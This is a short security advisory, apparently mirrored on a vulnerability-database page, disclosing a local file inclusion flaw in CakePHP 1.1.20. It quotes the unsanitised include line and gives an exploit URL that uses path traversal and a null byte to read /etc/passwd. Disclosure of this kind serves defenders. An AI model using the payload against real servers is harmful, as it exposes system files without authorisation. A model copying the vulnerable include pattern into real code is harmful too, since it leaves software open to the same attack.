Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormCru3l.b0yPACKETSTORM:78936
HistoryJul 06, 2009 - 12:00 a.m.

CakePHP 1.1.20 Local File Inclusion

2009-07-0600:00:00
Cru3l.b0y
packetstormsecurity.com
22
JSON
` ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
+ +  
+ CakePHP 1.1.20 Local File Inclusion Vulnerability +  
+ +  
+ Discovered by Cru3l.b0y +  
+ +  
+ WwW.DeltaHacking.Net +  
+ +  
+ +  
+ +  
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
  
  
###################################################################################################  
AUTHOR : Cru3l.b0y  
APPLICATION : CakePHP  
VERSION : 1.1.20  
DOWNLOAD : http://cakeforge.org/frs/download.php/677/cake_1.1.20.7692.tar.gz/donation=complete  
VENDOR : http://cakeforge.org/  
###################################################################################################  
  
  
Vulnerable Code :  
###################################################################################################  
/cake/libs/configure.php   
  
215 include(CONFIGS . $fileName . '.php');   
  
  
[+]Exploit: http://[t4rg3t]/[p4th]/cake/libs/configure.php?fileName=../../../etc/passwd%00   
###################################################################################################  
`
JSON